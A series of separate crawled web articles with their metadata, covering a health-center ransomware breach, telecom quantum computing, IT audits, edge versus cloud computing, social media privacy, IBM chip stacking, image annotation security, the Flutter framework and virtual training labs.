A ransomware attack beginning in September has left Betty Jean Kerr People’s Health Centers scrambling. The health center declined to pay the ransom, as such they are unable to access their computer networks. However, they have hired a forensic information tech firm to try to recover the patient data. Protected health information (PHI) that may have been exposed in the ransomware attack includes patient names, addresses, dates of birth, Social Security numbers, pharmacy data, clinical data, insurance information, and dental X-rays. The health center has notified the 152,000 affected patients, and has recommended that patients monitor their account statements. They will also be offering free credit monitoring to affected patients. Avoid HIPAA fines by becoming HIPAA compliant today! How to Protect your Organization Against a Ransomware Attack Ransomware attacks occur when a hacker gains unauthorized access to an organization’s network, often encrypting or stealing files. Files are inaccessible by the target until a sum of money is paid for their return. To protect your organization from a ransomware attack the Department of Health and Human Services (HHS) recommends the following ten cybersecurity practices: - Email protection systems - Endpoint protection systems - Access management - Data protection and loss prevention - Asset management - Network management - Vulnerability management - Incident response - Medical device security - Cybersecurity policies Is your organization secure? Download the free cybersecurity eBook to get tips on how to protect your patient information. Healthcare organizations are increasingly targeted by hackers as the wealth of information they hold on their patients has a high value on the darkweb. Information obtained from a healthcare breach can be used to commit identity theft, fraud, or used to blackmail patients. Implementing the recommended cybersecurity practices can save your organization from a ransomware attack, preserving your reputation and your wallet.
<urn:uuid:d733870a-8a00-4789-ad44-19d2fb56b995>
CC-MAIN-2024-38
https://compliancy-group.com/152000-patients-affected-by-st-louis-medical-center-ransomware-attack/
2024-09-09T09:50:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00260.warc.gz
en
0.926296
376
2.671875
3
Telecom Quantum Computing: A Dream or a Fantasy? A quantum computer is a special kind that uses quantum mechanics to perform some computations more quickly than a conventional computer. Once the technology is in complete form, it is set to revolutionize every industry known to humankind. Alongside the pharmaceutical and cybersecurity sectors, experts postulate that this innovation will change the telecoms industry as we know it, primarily through quantum-resistant cryptography. As joyful and hopeful as these promises sound, telecom quantum computing presents many obstacles that may render it a fantasy rather than a dream. Telecom Quantum Computing: Potentially Redefining the Sector Quantum computing could redefine the entirety of the Telecommunications Sector. Remember that a quantum computer is akin to a supercomputer on steroids in terms of performance and capabilities. And to think that quantum computing was only a theory a couple of years ago! Embedding Itself into the Sector The technology has a couple of different use cases in telecommunications. For the first time in Europe, TIM, formerly known as Telecom Italia Mobile, claimed that it had used quantum computing for 5G network planning in February 2020. The mobile operator used the quadratic unconstrained binary optimization (QUBO) algorithm to plan the 4.5G and 5G network parameters on D-Wave’s commercially available 2000Q quantum computer. In fact, because it can identify patterns in data sequences, this algorithm is helpful for machine learning. According to TIM, the computer completed the task ten times faster than traditional methods. TIM claims that using this algorithm to plan cell IDs led to a more stable VoLTE (Voice-over Long Term Evolution) experience for customers who were on the move. Development of RAN Specific quantum computing algorithms made up of quantum gates will be necessary to carry out the RAN’s management plane and user data plane functionality. Only a few of the classical algorithms have a quantum counterpart as of yet, and not all of them are described in the quantum world. Physical layer processing functions have strict requirements for latency. Therefore, they probably run on local hardware instead of cloud-based hardware. The quantum chipset has a capacity of 50100 qubits. In order to speed up the virtualized RAN function, the mobile operator can place quantum chips in a compact form close to the customer’s home or even inside the digital unit of the quantum processor. Optimization of the Network quantum computers require specialized algorithms in order to carry out quick and precise operations. With the help of specific algorithms, global convergence is achievable while increasing computing power and operating speed. These could lead to a wide range of network optimization applications, including solving challenging business issues and making financial savings. Not as Achievable as It Sounds According to experts in this field, ranging from physicists to computing geniuses, the technology is at least three years away from being scalable and as applicable as it needs to be to run the show in all industries, especially that of telecoms. The development and subsequent application of telecom quantum computing have some obstacles to clear first. Handle with Care The classic binary bit’s quantum counterpart is the Qubit. And it is physically realized with a two-state device, i.e., the quantum computer. These basic quantum units of information allow the technology to be as efficient in its complex calculations. The only downside to them is that they are very fragile. In fact, they are extremely susceptible to heat. Hence, they require extremely low temperatures to function. As a result, building, verifying, and designing quantum systems is a challenging feat. This fragile nature renders quantum computing more error-prone and less reliable than traditional computing. Errors are an unavoidable phenomenon in computation, and this is especially true in quantum computation, where we must exercise precise control over the behavior of ultra-sensitive quantum systems. Enters quantum error correction (QEC)! This branch of quantum computing concerns protecting quantum information from errors resulting from decoherence and other quantum noise. In addition, experts postulate that it is essential to achieve fault-tolerant quantum computing that can reduce the following: - The effects of noise on stored quantum information - Faulty quantum gates - Faulty quantum preparation, - Faulty measurements In my line of work, I’ve heard, “Telecom is the foundation of the future,” more times than I care to admit. And as time goes on and as I write more articles and delve deeper into this industry, I find myself agreeing. The telecom sector is, indeed, the future. In fact, this sector is capable of powering many innovations, including the metaverse. But its true power and potential could be exponentially greater through quantum computing. Telecom quantum computing has the potential to become the future but not without some setbacks first. How experts deal with said setbacks will determine whether the end goal is a dream coming true in the next five years or a fantasy by brilliant yet wishful minds. Inside Telecom provides you with an extensive list of content covering all aspects of the tech industry. Keep an eye on our Intelligent Tech sections to stay informed and up-to-date with our daily articles.
<urn:uuid:6ae39868-9ead-412e-92b2-d1ba8e96c1c1>
CC-MAIN-2024-38
https://insidetelecom.com/telecom-quantum-computing-a-dream-or-a-fant/
2024-09-09T09:40:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00260.warc.gz
en
0.928209
1,057
2.71875
3
IT audits are essential for maintaining the security and integrity of corporate data, focusing on a company’s technological framework, procedures, and policies. Through this process, auditors scrutinize the IT systems to verify that they meet business needs effectively while ensuring data protection. These audits involve a series of systematic steps aimed at assessing whether IT infrastructure not only aligns with the organization’s goals but also adheres to security standards and best practices. An IT audit begins with planning, where auditors define the scope and objectives. They gather information about the existing IT environment and establish benchmarks against regulatory requirements or industry standards. The next phase is fieldwork, where auditors test the controls in place, verify compliance with policies, and evaluate system performance and security measures. The findings are then compiled, and any weaknesses or gaps in the system are highlighted. Based on these insights, a report is generated that outlines recommendations for improving the infrastructure and securing data. The final step is a follow-up review to ensure that suggested improvements have been implemented. The importance of IT audits lies in their role in preventing data breaches, ensuring compliance with laws and regulations, and enhancing overall operational efficiency. Regular IT audits are thus crucial for any organization that relies on technology for its day-to-day operations. 1. Obtain Approval Before embarking on an IT audit, the first essential step is to gain approval from senior management. This endorsement is not just a formality; it shows that the audit has the necessary backing and resources. The approval sets a precedent for the audit’s importance and ensures that the findings will be taken seriously, leading to the implementation of recommended changes. Once approval is received, the scope of the audit must be clearly defined. This includes articulating the main objectives, which could range from assessing compliance with regulations to improving system security. With a clear mandate, auditors can focus their assessment efficiently and effectively. 2. Develop a Strategy Developing a well-outlined strategy is foundational for a successful IT audit. This plan outlines which components of the IT infrastructure will be examined, which types of controls will be assessed, and how deeply the audit will delve into the company’s IT environment. The strategy should also lay out clear objectives, including what the audit aims to achieve, and set realistic timeframes for completion. Whether the concern is cybersecurity, data integrity, or operational efficiency, the audit plan should reflect the organization’s unique needs and resources. During this planning stage, it’s important to understand that the strategy essentially guides the course of the audit. It ensures that all necessary aspects are covered without straying from the main objectives, creating a reliable pathway for the auditors to follow. 3. Begin Preparation The preparation stage involves deciding who will conduct the audit, which could be an in-house team, the company’s internal audit department, or an external entity. Each option comes with its advantages and implications. First-party audits, by an in-house team, benefit from the auditors’ intimate knowledge of the company. Second-party audits involve the company’s internal audit department and ensure adherence to internal standards. Third-party audits offer an external perspective and are often seen as the most impartial. Choosing the right audit team is paramount because their expertise will directly influence the audit’s quality. The team must have a mix of technical knowledge, analytical skills, and a firm understanding of the standards that the company must adhere to. 4. Arrange an Audit Space A proper workspace for the audit team is crucial for a productive audit. Typically, a reserved conference room functions as the command center, where auditors analyze documents, hold interviews, and discuss their observations. A dedicated area helps maintain uninterrupted work and the confidentiality of sensitive data. The room not only offers a physical zone for auditors but also reflects the mental zone of deep focus and meticulous examination they enter during an audit. By providing a well-equipped work environment, an organization shows its commitment to the auditing process, creating a professional atmosphere conducive to high-quality auditing work. To ensure the space is effective, it should be quiet, have sufficient lighting, be equipped with necessary technology, and have enough room for collaboration among auditors as well as for private conversations. The audit space is more than just a room; it’s a sign of the organization’s respect for the importance of the audit and the auditors’ need for a space that supports their critical work. 5. Initiate the Audit Process Launching the audit involves briefing the IT department on the process, objectives, and how the audit will unfold. Transparency about the expectations and the types of evidence required is crucial at this stage to mitigate any apprehension and to encourage cooperation from the IT staff. The initial interaction establishes the tone of the audit, emphasizing collaboration over inquisition. This phase sets up the groundwork for a smooth review process, with less friction and resistance from the IT department, thereby improving the chances of a comprehensive and truthful assessment of the IT controls. 6. Compile Documentation Conducting a thorough audit requires obtaining and evaluating a range of documentation, from official policy documents to notes taken during interviews. Auditors gather these records to construct a comprehensive view of the IT department’s performance, its policies, and its conformity with the established controls. The methodical organization of this documentation is crucial for maintaining a clear path of evidence and underpinning the final report with solid proof. Each document contributes to a clearer understanding of the IT landscape and points towards potential areas of improvement. By piecing together these documents, auditors can meticulously assess the IT department’s operations. They can pinpoint where the department aligns with best practices and identify any gaps in compliance or areas where security may be at risk. This process is pivotal in recommending changes that could fortify IT processes and enhance data management practices. Ultimately, the documentation collected serves as both a reflection of the IT department’s current state and a roadmap for its enhancement. It is a testament to the thoroughness of the audit process and the detailed scrutiny under which the IT department is evaluated. 7. Finalize and Present the Audit Report The final report of an IT audit is a crucial document that presents a comprehensive assessment of the IT department’s adherence to internal controls and pinpoints areas for improvement. This report is not merely a summary of the audit process but a significant instrument that enables the organization to fortify its IT framework, mitigate potential risks, and uphold stronger security and regulatory compliance standards. Crafting a report that is both detailed and accessible is paramount—the aim is for it to be digestible to senior management and relevant parties. Through its guidance, these leaders can initiate the appropriate corrective measures. Upon delivery, the report catalyzes the transition from evaluative review to proactive implementation. Its pivotal role underscores the value of the IT audit as not just a retrospective critique but as a lever for transformation, driving the organization’s IT infrastructure towards higher levels of operational excellence.
<urn:uuid:768c1fd6-6018-4091-af1c-e04760a1c4c1>
CC-MAIN-2024-38
https://developmentcurated.com/testing-and-security/comprehensive-guide-to-it-audits-for-organizational-security/
2024-09-10T13:47:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00160.warc.gz
en
0.92784
1,447
2.65625
3
Edge computing is a decentralized computing model that brings computational resources closer to the data source or endpoint. It involves processing data locally on devices or at edge servers, reducing latency and improving response times. Edge computing is often used for real-time data processing and applications that require low latency, such as IoT devices and autonomous vehicles. Cloud computing, on the other hand, is a centralized model that relies on remote data centers to process and store data. It offers scalability, accessibility, and cost-efficiency but can introduce latency due to data transfer to and from the cloud. Cloud computing is widely used for web services, data storage, and enterprise applications. Mark Swinson, enterprise IT automation specialist at Red Hat tells EdgeIR that edge computing is an ecosystem play, bringing different parts together to create solutions with flexibility. “With the development of AI and machine learning, it’s increasingly likely that an application’s lifecycle will circulate through both ends of the spectrum, from the data center to the edge – therefore new solutions must equally support both,” he adds. “Developments in cloud computing, such as the way Kubernetes implements a ‘desired state’ system where outcomes are specified, make managing complex topologies at scale more feasible. Applying these same approaches brings benefits to edge solutions too. As computing resources at the edge continue to grow in capability and capacity, we’re set to see more sophisticated workloads to be run close to where data is produced. This necessitates not only common standards and approaches but an intent to collaborate and, to some extent, a willingness to experiment. “There’s no getting away from the dispersed nature of edge computing, or the need for remote installation. Once a device has been plugged in and powered on, automating the setup reduces the scope for errors and mitigates the need for highly skilled technicians. In summary, edge computing will become less distinct from data center-based computing and rather a continuum with consistent architectures, tools, processes and security. This will lead to greater flexibility, agility and confidence, opening up more edge computing opportunities.” Location of processing and latency With edge computing, processing occurs at or near the data source or endpoint, making it ideal for applications that demand immediate response times. Examples include industrial automation, autonomous vehicles, and augmented reality. In comparison, with cloud computing, processing occurs in remote data centers, which can introduce latency. Cloud computing is suitable for applications where latency is less critical, such as email services, document storage, and data analysis. Speaking with Rajasekar Sukumar, SVP and head of Europe at Persistent Systems, says: “For some businesses, the remote infrastructure of the cloud simply can’t provide the ultra-low latency needed to transfer data swiftly from point A to point B. This is where edge computing comes into play – bringing data processing physically closer to the source. “Though it sounds like another buzzword, ‘edge’ is very helpful in understanding this technology, as it refers literally to geographic proximity – it happens at the ‘edge’ or periphery of the network. A helpful analogy is comparing the cloud to a restaurant’s kitchen. Edge computing positions computation at the ‘chef’s table’ – not in the thick of the action but much closer than a typical dining table. “This proximity enables real-time insights from vast datasets that would otherwise suffer lag moving to and from the cloud. Like having your meal prepared right in front of you rather than waiting for a waiter, edge computing eliminates unnecessary distance between data and processing. For businesses looking to become data-driven, edge computing unlocks key capabilities like instant analytics and rapid response times. It represents a paradigm shift in how computation can enhance data-intensive workflows without the cloud’s inherent latency. The edge’s speed and localization are leading to transformative new use cases across various industries. It’s a disruptive new computing model unlocking innovation through proximity.” Edge computing offers ultra-low latency since data is processed locally or near the data source. This makes it crucial for applications that require real-time decision-making, like self-driving cars or telemedicine. Cloud computing can introduce higher latency due to data transfer between the edge device and the remote data center. It may not be suitable for applications that demand near-instantaneous responses. Scalability, security and cost When looking at edge computing, scalability can be limited by the physical infrastructure of edge devices. Adding more edge servers may require additional hardware and resources. Cloud computing, on the other hand, offers high scalability due to the vast resources available in data centers. Users can easily scale up or down according to their requirements. In regards to security, with edge computing, data remains closer to the source, potentially reducing the risk of data breaches during transit. However, edge devices may be more vulnerable to physical tampering. With cloud computing, data is stored remotely, which can be advantageous for data security. Cloud providers often invest heavily in cybersecurity measures. However, data transmission to the cloud can pose security risks. When comparing cost, the initial setup costs for edge infrastructure can be high. Maintenance and upgrades may also incur ongoing expenses. Nevzat Ertan, chief architect and global manager for digital machining architecture at Sandvik Coromant, says: “Edge computing and edge analytics describe data capture, processing and analysis that take place on a device — on the edge of the process — in real-time. Unlike traditional methods, which typically collate data from several machines at a centralized store, edge computing is a distributed computing that brings a single, or a group of machines computation and data storage closer to the sources of data. This can improve response times and save bandwidth. “Conducting analytics at an individual device can provide significant cost and resource savings compared to data processing using a purely cloud-based method. For clarity, this cloud-based, method refers to streaming data from multiple devices to one centralized store and conducting data analysis there. “Using the centralized method, huge volumes of data must be collected and transferred to one place before they can be analyzed. This method can also create a massive glut of operational data — and weeding out insightful knowledge from the monotonous can be a painstaking task. With edge computing, operators can instead set parameters to decide which data is worth storing — either in the cloud or in an on-site server — and which isn’t.” Ertan adds that edge computing is not an alternative cloud-based methods, and highlights that these technologies are not competing against each other. “In fact, each is making the other’s job easier. The benefit of this combined model is that it allows enterprises to have the best of both worlds: reducing latency by making decisions based on edge analytics for some devices, while also collating the data in a centralized source,” he continues. Ideal for real-time applications like autonomous vehicles, smart cities, and remote monitoring in industries, edge computing can also enhance privacy by processing data locally. While cloud computing is typically suited for web hosting, big data analysis, content delivery, and enterprise applications that do not require real-time processing, both edge computing and cloud computing can work hand in hand. “Edge computing and cloud computing are two distinct computing paradigms that serve different purposes but can also complement each other in certain scenarios. Both edge computing and cloud computing can offload data processing and storage from local devices, reducing the burden on end-user devices and enabling more efficient resource utilization,” says Sundaram Lakshmanan, CTO at Lookout. “Edge computing and cloud computing can work together in a complementary manner. Edge computing can handle real-time processing and immediate decision-making, while cloud computing can handle more resource-intensive tasks, long-term storage, and complex analytics. “Edge computing focuses on processing data locally and reducing latency, while cloud computing offers scalability, extensive storage, and centralized processing. Both paradigms have their unique strengths and can be used together to create a hybrid computing environment that optimizes performance and efficiency based on specific use cases and requirements.” In practice, a combination of both edge and cloud computing, known as hybrid computing, is often used to leverage the advantages of each model. Edge computing and cloud computing are distinct approaches to handling the growing demands of modern computing, and as technology continues to evolve, the boundary between edge and cloud computing could potentially blur, creating more opportunities for innovation and efficiency. cloud computing | edge computing | latency | security
<urn:uuid:e447ced7-5501-42a8-b536-1f943c671f80>
CC-MAIN-2024-38
https://www.edgeir.com/edge-computing-vs-cloud-computing-whats-the-difference-20231018
2024-09-10T14:55:37Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00160.warc.gz
en
0.916656
1,787
3.046875
3
Safe Social Media: Protecting Your Online Persona In today’s digital age, social media has become an integral part of our lives, serving as a platform for communication, self-expression, and connection. However, as we share our thoughts, photos, and experiences online, we also expose ourselves to potential risks. Protecting your online persona is crucial in safeguarding your privacy, reputation, and personal information. Understanding the Risks: The first step to protecting your online persona is understanding the risks associated with social media. These risks include: - Privacy Invasion: Sharing personal information, such as your location, contact details, and daily activities, can make you vulnerable to stalking, identity theft, and other privacy invasions. - Cyberbullying: Social media can be a breeding ground for cyberbullying, where users can be subjected to harassment, threats, and abuse. - Reputation Damage: Inappropriate posts, comments, or photos can harm your reputation, affecting your personal and professional life. - Phishing and Scams: Social media platforms are often targeted by scammers and hackers looking to steal personal information or money. Protecting Your Privacy: To protect your privacy on social media, consider the following tips: - Review Privacy Settings: Regularly review and adjust your privacy settings to control who can see your posts and personal information. - Be Mindful of What You Share: Think twice before sharing personal information, such as your location, contact details, and daily activities. - Use Strong Passwords: Use strong, unique passwords for each social media account and enable two-factor authentication when available. - Be Wary of Phishing Scams: Be cautious of suspicious messages or links, as they may be phishing attempts to steal your personal information. Maintaining a Positive Reputation: Your online persona can significantly impact your personal and professional life. To maintain a positive reputation, consider the following tips: - Think Before You Post: Consider the potential consequences of your posts, comments, and photos before sharing them online. - Avoid Controversial Topics: Avoid engaging in controversial or divisive topics that may harm your reputation. - Be Respectful: Treat others with respect and kindness and avoid engaging in online arguments or harassment. - Monitor Your Online Presence: Regularly search for your name online to monitor your online presence and address any harmful content. Dealing with Cyberbullying: Cyberbullying can have severe emotional and psychological impacts. To protect yourself from cyberbullying, consider the following tips: - Block and Report: Block and report users who engage in cyberbullying or harassment. - Seek Support: Talk to friends, family, or a counselor if you are experiencing cyberbullying. - Document the Bullying: Keep records of any cyberbullying incidents, including screenshots and messages, as they may be needed for reporting or legal purposes. - Know Your Rights: Familiarize yourself with the laws and policies related to cyberbullying in your country or region. Protecting your online persona is crucial in today’s digital age. By understanding the risks, safeguarding your privacy, maintaining a positive reputation, and dealing with cyberbullying, you can enjoy the benefits of social media while minimizing potential risks. Remember that your online actions can have real-world consequences, so always be mindful of what you share and how you interact with others online.
<urn:uuid:f0ec3b6d-b007-4286-862a-d3d541919882>
CC-MAIN-2024-38
https://www.cover6solutions.com/safe-social-media-protecting-your-online-persona/
2024-09-11T19:45:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651400.96/warc/CC-MAIN-20240911183926-20240911213926-00060.warc.gz
en
0.906318
695
2.859375
3
The process removes glass bonding layers – and lowers defect rates. As semiconductors continued to get smaller, chipmakers began to strain the limits of Moore’s Law, which postulates that the number of transistors on a microchip would double every two years to yield much faster computational power in smaller chips. Now, IBM and Tokyo Electron (TEL) said they found a new method to save Moore’s Law and simplify the supply chain for chipmaking. The two developed a new method for 3D chip stacking that can produce 300 millimeter silicon chip wafers, an apparent world’s first. IBM said chip stacking can potentially expand the number of transistors in a given volume – rather than an area, as Moore’s Law calls for. IBM and TEL said they created the 300 millimeter module using an “infrared laser to enable a debonding process that’s transparent to silicon — meaning standard silicon wafers can be used” without needing a temporary glass layer for processing. “As the global chip shortage continues, we’ll likely need novel ways to increase chip production capacity over the coming years,” IBM said in a blog. “We hope our work will help cut down on the number of products needed in the semiconductor supply chain, while also helping drive processing power improvements for years to come.” The project is a culmination of four years of work. The pair plan further tests, which will examine ways to implement the process into a full semiconductor manufacturing flow. To date, chip stacking is only seen in high-end operations such as the production of high-bandwidth memory. However, IBM and TEL believe it has the potential to expand the number of transistors in a specific volume. Chip-stacking architectures require vertical connections between layers of silicon called through-silicon vias (TSVs). These are small connections that allow for a current to flow between one silicon layer to another, essentially letting each layer to 'talk' to the others. The process involves thinning a silicon wafer to reveal the fabrication of TSVs required for vertical stacking. To transport these thin, fragile silicon wafers, manufacturers introduce glass to the process to create a bonding layer so the wafers can be transported without damage. Once processed, the glass is removed via ultraviolet lasers. IBM and TEL’s novel method removes the need for glass – and reportedly leads to fewer defects during production, which in turn would ease the growing strain placed on chipmakers. The global chip shortage has seen production decrease due to factors such as the pandemic and ever-increasing demand. However, signs are emerging that the chip shortage may be easing, according to Omdia analyst Alexander Harrowell. About the Author You May Also Like
<urn:uuid:3fd75364-ce46-48b6-b1a4-041272955fdf>
CC-MAIN-2024-38
https://aibusiness.com/companies/ibm-s-new-3d-chip-stacking-method-rescues-moore-s-law
2024-09-14T04:12:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00760.warc.gz
en
0.928791
587
3.953125
4
In this digital age, security has become paramount, especially when protecting our data. Image annotation is used to classify objects within images, while cybersecurity is used to protect this information from malicious actors. In order for businesses and organizations to properly secure their data, it’s important to understand how these two disciplines intersect. The goal of image annotation is to accurately identify objects within an image using an image annotation tool so that they can be classified and labeled correctly. This information can then be used for a variety of purposes, such as computer vision applications or machine learning algorithms. Cybersecurity, on the other hand, focuses on protecting this data from unauthorized access by malicious actors. The combination of both image annotation and cybersecurity for businesses incredibly helps to ensure that only authorized personnel have access to sensitive information within their images. Furthermore, by utilizing automated tools such as artificial intelligence (AI) for object detection and recognition, companies can quickly detect any suspicious activity or anomalous behavior within their systems. Automated Image Annotation Techniques For Improved Security An image annotation tool is very important since it helps machines understand and interpret what is present. This technology is particularly useful for security, as it quickly identifies any potential threats or anomalies. Automated image annotation techniques can be used to detect intruders in a network, identify suspicious behavior in video surveillance footage, or even monitor traffic patterns on roads and highways. Furthermore, this type of annotation can accurately track changes in an environment over time. For example, if a suspicious object appears at a certain location multiple times, automated image annotation could help determine if this is part of normal activity or if it could potentially pose a threat. The usage of these tools enables the security team to quickly identify and respond to potential risks before they become serious issues. What Are the Benefits of Using Automated Methods For Image Annotation and Security? Automated methods for image annotation and security are beneficial in a number of ways. First, they can save time and money by eliminating the need to annotate images manually. Automated methods are also more accurate than manual annotation, as they can detect objects in an image with greater accuracy and precision. In addition to that, automated methods can be used to detect potential security threats in images, such as malicious code or malware. This helps ensure that images are safe before being shared or published online. Finally, automated methods can help reduce the risk of human error when annotating images, which could lead to incorrect labels or inaccurate results. What Measures Should Organizations Take to Ensure Their Images Are Annotated Securely? Organizations should take several measures to ensure their images are annotated securely. First, they should use a secure cloud-based platform for image annotation. This will help protect the data from unauthorized access and keep it safe from malicious actors. Also, organizations should implement encryption measures on all data stored on the platform and use robust authentication protocols to verify user identities. They should also implement strict access control policies that limit who can view or modify the data. Finally, organizations should regularly audit their systems to ensure that all security measures are being followed and any potential vulnerabilities are addressed promptly. Following such steps will greatly ensure that organizations have their images annotated securely and protected from malicious actors. To summarize, image annotation and cybersecurity need to work together to create a secure and efficient system for data security. By understanding the intersection between these two fields, organizations can ensure that their data remains safe while benefiting from the advantages of image annotation.
<urn:uuid:4b7405f5-e59b-44d5-82bb-3747ae8b748c>
CC-MAIN-2024-38
https://www.infosecurity-magazine.com/blogs/intersection-image-annotation/
2024-09-16T17:07:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00560.warc.gz
en
0.938086
697
2.921875
3
Jindrich Pikorafrom Prague and London based web and app developers, www.applifting.cz, introduces us to Flutter, a new software tool that is empowering and speeding up app development. According to Statista there are now over 6 billion smartphones being used across the globe so it’s no surprise that the number of apps available to users is increasing all the time. New apps are constantly being developed, some getting millions of downloadsand others just a handful of downloads. Flutter – Build apps for any screen The developers behind these apps have many different tools at their disposal. One of them is Flutter, which has become increasingly popular in the last couple of years so for this reason it’s a good time to look at this app development platform. What is Flutter? Flutter is a framework developed by Google that allows you to create mobile apps for iOS, Android, and other platforms using a single source code. It is a cross-platform technology with which you can develop several apps at the same time. Compared to going native, it comes with several perks, such as speeding up the overall process of development; there are, however, also a couple of disadvantages too but let’s go into that later. The first mentions of Flutter appeared in 2015, but it was only in December 2018 that the first stable release was out. Nowwe have Flutter 3.0, which compared to the previous releases is more secure, powerful, and packed with more features. Originally, it was used to develop mobile apps only, but this has now been extended to web applications and macOS, Linux, and Windows apps. The pros and cons of Flutter Flutter isn’t the first attempt at making a tool for creating cross-platform apps. It is predated by Xamaric, Ionic, or React Native, to name a few. Nowadays, Flutter is the most popular of those so how does it fare in comparison to Swift and Kotlin in terms native mobile app development for iOS and Android? - Cross-platform—you can develop two apps with one source code. No need for two different technologies. It isn’t twice as effective, as one might think, but it does help save a lot of time. - Speed—the way the code is developed is another aspect that saves time. Declarative programming significantly speeds up development, much like the hot reload function, thus doing away with the need to recompile. - Performance—which is comparable to native apps. For example, you can add snappy animations of any complexity. - Customization—there is a vast array of easy-to-use premade components. Flutter’s intuitive approach to combining components allows you to tailor your app to any design, no matter how complex it is. - Documentation—the technology is open source, therefore everyone is free to look at the source code. What’s more, all the parts are well documented and detailed, so you won’t run into any trouble there. - Community—with an increase in use and popularity, Flutter comes with an ever-growing number of new libraries, improvements, and tutorials. - Size—the final size of apps is larger. Downloading, installing, and updating takes a longer time, and the apps take up more space in users’ phones. Compared to native apps, we’re talking about a 20% increase in size. - Specific requirements—accessing certain hardware functions on mobile devices is more complicated than it is with native development. In some cases, you need to implement things twice, both in terms of the technology as well as the system Flutter is running on. In general, the more system functions the app utilizes the less you benefit from how quick the development is. - Flutter is new—it’s been just a few years since it’s been released, and it’s still a work in progress. As much as the community is growing, there simply aren’t that many tried-and-true best practices yet. When to use Flutter Due to the advantages mentioned above, developing cross-platform apps in Flutter is in high demand. Even larger companies use Flutter for their apps, such as Alibaba, BMW, or even Google itself. Consequently, some developers thought that native development is no longer needed and everything should be developed in Flutter. That is not the case. We must not forget its shortcomings, which make developing native apps for each platform separately the better choice. As has been mentioned before, you can use Flutter to develop desktop apps as well, though it isn’t that common. Web development is suitable only for a couple of web apps—like those dealing with administration, games, and graphically demanding systems. On the other hand, it’s not suitable for your run-of-the-mill websites. There are certain limitations that it comes with, like some packages not being supported or the lack of browser optimization (SEO). Where does Flutter shine? Flutter is a great choice for small-scale apps that often just display and send data to a server. In such cases, you won’t find yourself running into trouble during the development, you will progress quickly, and you’ll need just one team of developers instead of two It’s also suited for app prototypes or swift product validation. While there are other tools for prototyping, they are often locked away behind paywalls, and experience is needed to make their use worthwhile. In comparison, Flutter is universal, and its strength lies in the Dart programming language, which lends itself well to implementing prototypes. When to think twice about using Flutter It is possible to develop larger apps with Flutter, but they shouldn’t come with too many native features. You also need to be prudent and consider whether the app will scale massively and what other features might be required. Then the disadvantages might be more obvious. But if all these concerns are taken into consideration, there is nothing stopping you from getting on with development. Flutter is still a somewhat novel tool for developing cross-platform mobile apps, but over the course of its existence, it has come out on top as the most sought-after one. Much like any other technology, it has a share of benefits and challenges. Before you commit to using it, it’s important to think through the features your app will have and whether choosing Flutter will speed things up for your developers. If you get the balance right,using Flutter for app development is then a great choice.
<urn:uuid:23d46306-3a92-458a-9bc3-b8e2750b95cb>
CC-MAIN-2024-38
https://bizdispatch.com/should-web-developers-be-getting-excited-about-a-little-flutter/
2024-09-08T06:01:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00460.warc.gz
en
0.963212
1,376
2.609375
3
Virtual training labs are cloud-based training environments that emphasize an online, hands-on learning experience over a passive classroom-based one. A relatively recent innovation, virtual training platforms have become increasingly popular in the tech industry to train both employees and clients on the complexities of new software. CloudShare virtual training lab environment – classroom What Are Virtual Training Labs Benefits? Virtual training tools offer a variety of benefits that make them an attractive choice for customer training and software demonstrations: They offer a direct, interactive connection with the training environment. They can be accessed from any machine with an Internet connection. They are easily accessible by a larger portion of students. They have the benefit of in-person training with a real instructor. The Advantage of Virtual Training Labs Over Traditional Classrooms Interactive and immersive learning through virtual training is replacing the passive learning style of traditional classrooms and training environments for several reasons, including: Virtual labs are much less expensive since the travel expenses, IT resources, and laboratory maintenance necessary for classroom lessons aren’t as prominent. Without the need for physical travel, virtual classrooms are more convenient for both students and instructors. Physical classrooms are difficult to scale for larger groups of students as the cost of scheduling meetings rises exponentially with more clients. Virtual environments and lessons can be taken anywhere around the world using a simple browser. The interactive nature of virtual training labs enables the optimal conditions for knowledge retention. Why Virtual Labs Are More Efficient The tech industry often trains its clients on how to use new software through virtual means since learning retention is consistently higher. Virtual training tools encourage the following: Learning by doing rather than watching.A University of Chicago study revealed that physical training had a larger impact on student skill than passive learning in the field of science. It’s no different when it comes to training customers to use your software. Replicating realistic situations. Expect a stronger understanding to develop in learners when training replicates scenarios that they will experience themselves. Virtual environments. Virtual labs allow instructors to create an active learning environment by answering the students’ questions and communicating through the cloud. Desktop sharing with the instructor. Instructors can monitor multiple screens at once and ensure that their learners are approaching tasks correctly.
<urn:uuid:c6f7ad79-f3d0-4808-8083-259672a44884>
CC-MAIN-2024-38
https://www.cloudshare.com/virtual-it-labs-glossary/what-are-virtual-training-labs
2024-09-08T07:33:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00460.warc.gz
en
0.938976
457
2.71875
3
